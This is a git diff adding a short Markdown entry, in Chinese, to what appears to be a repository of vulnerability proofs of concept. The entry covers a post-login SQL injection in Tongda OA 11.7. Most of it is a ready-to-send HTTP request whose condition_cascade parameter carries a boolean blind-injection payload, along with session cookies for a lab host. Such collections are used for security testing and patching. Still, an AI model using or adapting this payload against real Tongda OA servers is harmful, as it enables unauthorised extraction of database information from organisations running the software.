diff --git a/01-通达OA/通达OA 11.7 后台sql注入漏洞/通达OA 11.7 后台sql注入漏洞.md b/01-通达OA/通达OA 11.7 后台sql注入漏洞/通达OA 11.7 后台sql注入漏洞.md
new file mode 100644
index 0000000..c1e6827
--- /dev/null
+++ b/01-通达OA/通达OA 11.7 后台sql注入漏洞/通达OA 11.7 后台sql注入漏洞.md	
@@ -0,0 +1,22 @@
+# 通达OA 11.7 后台sql注入漏洞
+
+### 漏洞影响版本
+11.7
+
+### 利用前提
+需要登录后才可以
+
+### POC
+其中 `condition_cascade` 参数存在Boolean 盲注
+```http request
+GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(8888,88)) HTTP/1.1
+Host: 192.168.77.137
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20200101 Firefox/82.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.77.137/general/index.php?isIE=0&modify_pwd=0
+Cookie: PHPSESSID=vA8ZHgClYnJzI3sGocm1LBbW27; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d
+DNT: 1
+Connection: close
+```
\ No newline at end of file